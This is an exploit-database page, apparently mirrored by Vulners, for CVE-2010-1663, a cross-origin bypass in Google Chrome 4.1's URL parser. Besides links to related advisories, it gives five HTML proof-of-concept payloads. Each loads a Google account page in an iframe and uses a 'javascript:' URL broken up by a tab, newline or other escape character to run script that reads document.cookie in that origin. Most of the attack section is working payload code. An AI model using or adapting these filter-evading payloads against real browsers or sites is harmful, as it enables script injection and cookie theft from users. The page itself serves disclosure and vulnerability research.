Lucene search
K

Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)

🗓️ 19 May 2010 00:00:00Reported by Jordi ChancelType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL) allows remote attackers to bypass Same Origin Policy

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
19 May 201000:00
zdt
Tenable Nessus
Google Chrome < 4.1.249.1064 Multiple Vulnerabilities
28 Apr 201000:00
nessus
Tenable Nessus
Google Chrome < 4.1.249.1064 Multiple Vulnerabilities
28 Apr 201000:00
nessus
Tenable Nessus
Google Chrome < 4.1.249.1064 Multiple Vulnerabilities
28 Apr 201000:00
nessus
Circl
CVE-2010-1663
19 May 201000:00
circl
Check Point Advisories
Google Chrome GURL Cross Origin Bypass (CVE-2010-1663)
9 Jun 201000:00
checkpoint_advisories
CVE
CVE-2010-1663
30 Apr 201017:00
cve
Cvelist
CVE-2010-1663
30 Apr 201017:00
cvelist
Debian CVE
CVE-2010-1663
30 Apr 201017:00
debiancve
EUVD
EUVD-2010-1684
7 Oct 202500:30
euvd
Rows per page
#	Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
#	CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
#	Author: Jordi Chancel
#
#	Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
#	Description: {
#		The Google URL Parsing Library (aka google-url or GURL) in Google Chrome 
#		before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy 
#		via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
#	Some PoC : 

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>

Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 May 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 210
EPSS0.07184
49